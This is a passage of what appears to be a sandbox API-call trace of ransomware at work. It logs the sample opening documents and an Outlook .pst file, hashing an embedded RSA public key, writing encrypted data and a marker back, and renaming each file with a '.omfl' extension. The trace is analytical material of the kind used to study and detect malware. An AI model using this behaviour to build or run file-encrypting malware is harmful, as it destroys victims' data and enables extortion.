hHeap=0x4970000) returned 1 [0132.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173a0 | out: hHeap=0x4970000) returned 1 [0132.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173d0 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd173b8 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17388 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17370 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db9e8 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.077] WriteFile (in: hFile=0x610, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x25800, lpOverlapped=0x0) returned 1 [0132.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0132.078] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.078] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.285] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.285] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.285] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.285] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.285] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.285] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.285] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.285] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.285] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.285] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.285] CloseHandle (hObject=0x610) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0132.289] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.289] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0c20 | out: hHeap=0x4970000) returned 1 [0132.289] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.omfl")) returned 1 [0132.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.290] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.290] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.291] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0132.291] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0132.292] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0132.292] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.292] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0132.292] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.292] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.292] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\") returned="tlPIR\\" [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.292] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49db9e8 [0132.292] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.292] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0132.293] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.293] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.293] PathFindFileNameW (pszPath="") returned="" [0132.293] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.293] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdd083180, ftCreationTime.dwHighDateTime=0x1d5d82c, ftLastAccessTime.dwLowDateTime=0x6e34dce0, ftLastAccessTime.dwHighDateTime=0x1d5da98, ftLastWriteTime.dwLowDateTime=0x6e34dce0, ftLastWriteTime.dwHighDateTime=0x1d5da98, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0132.293] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdd083180, ftCreationTime.dwHighDateTime=0x1d5d82c, ftLastAccessTime.dwLowDateTime=0x6e34dce0, ftLastAccessTime.dwHighDateTime=0x1d5da98, ftLastWriteTime.dwLowDateTime=0x6e34dce0, ftLastWriteTime.dwHighDateTime=0x1d5da98, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.294] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b351550, ftCreationTime.dwHighDateTime=0x1d5e432, ftLastAccessTime.dwLowDateTime=0xc0dcfa80, ftLastAccessTime.dwHighDateTime=0x1d5d7ce, ftLastWriteTime.dwLowDateTime=0xc0dcfa80, ftLastWriteTime.dwHighDateTime=0x1d5d7ce, nFileSizeHigh=0x0, nFileSizeLow=0x11518, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6hXSPsRe.odt", cAlternateFileName="")) returned 1 [0132.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.294] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0132.294] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\6hXSPsRe.odt") returned=".odt" [0132.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\6hXSPsRe.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\6hxspsre.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.294] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=70936) returned 1 [0132.294] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.297] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x114f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.297] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.299] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.299] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x11518, lpOverlapped=0x0) returned 1 [0132.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.300] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.300] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.301] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.301] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.301] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.301] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.301] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.301] GetLastError () returned 0x0 [0132.301] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.301] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.301] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.301] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.301] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.301] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.302] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.302] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.303] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x11518, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.303] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.303] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.303] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.303] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.303] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.303] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.303] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0132.303] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.303] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.303] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.303] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.303] CloseHandle (hObject=0x610) returned 1 [0132.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.308] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x74fb288 [0132.309] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.309] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\6hXSPsRe.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\6hxspsre.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\6hXSPsRe.odt.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\6hxspsre.odt.omfl")) returned 1 [0132.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.310] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.310] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.311] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1851c4e0, ftCreationTime.dwHighDateTime=0x1d5df99, ftLastAccessTime.dwLowDateTime=0xa9db88e0, ftLastAccessTime.dwHighDateTime=0x1d5dbb8, ftLastWriteTime.dwLowDateTime=0xa9db88e0, ftLastWriteTime.dwHighDateTime=0x1d5dbb8, nFileSizeHigh=0x0, nFileSizeLow=0x68c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aIf79i Cemgu-.odp", cAlternateFileName="AIF79I~1.ODP")) returned 1 [0132.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0132.311] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0132.311] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5a18 | out: hHeap=0x4970000) returned 1 [0132.311] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\aIf79i Cemgu-.odp") returned=".odp" [0132.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tlPIR\\aIf79i Cemgu-.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tlpir\\aif79i cemgu-.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.311] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=26824) returned 1 [0132.311] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.314] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x68a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.314] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.315] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.315] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.315] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.315] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x68c8, lpOverlapped=0x0) returned 1 [0132.316] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.316] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.316] lstrlenA (lpString="-----BEGIN PUBLIC 